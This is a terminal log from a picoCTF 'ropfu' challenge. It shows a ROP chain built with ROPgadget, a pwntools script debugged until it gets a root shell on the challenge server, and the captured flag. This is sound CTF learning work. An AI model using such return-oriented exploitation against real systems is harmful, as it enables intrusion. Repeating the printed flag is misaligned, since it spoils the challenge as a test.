binary_exploitation/ropfu/text.txt
──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ ROPgadget --binary vuln --ropchain > rop.txt 
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ vi ropgadget.py  
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ subl ropgadget.py 
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ python3 ropgadget.py                                    
  File "/home/secretK/picoCTF/binary_exploitation/ropfu/ropgadget.py", line 12
    p += pack('<I', 0x41414141) # padding
IndentationError: unexpected indent
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ python3 ropgadget.py
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/secretK/.cache/.pwntools-cache-3.11/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.12.0)
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ echo 'never' > /home/secretK/.cache/.pwntools-cache-3.11/update

                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ python3 ropgadget.py                                           
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ python3 ropgadget.py                                           
[+] Opening connection to saturn.picoctf.net on port 52535: Done
Traceback (most recent call last):
  File "/home/secretK/picoCTF/binary_exploitation/ropfu/ropgadget.py", line 49, in <module>
    r.sendline("A"*28+p)
               ~~~~~~^~
TypeError: can only concatenate str (not "bytes") to str
[*] Closed connection to saturn.picoctf.net port 52535
                                                                               
┌──(secretK㉿thebattle)-[~/picoCTF/binary_exploitation/ropfu]
└─$ python3 ropgadget.py
[+] Opening connection to saturn.picoctf.net on port 52535: Done
[*] Switching to interactive mode
How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!
$ whoami
root
$ ls
flag.txt
vuln
$ cat flag.txt
picoCTF{5n47ch_7h3_5h311_4cbbb771}$  
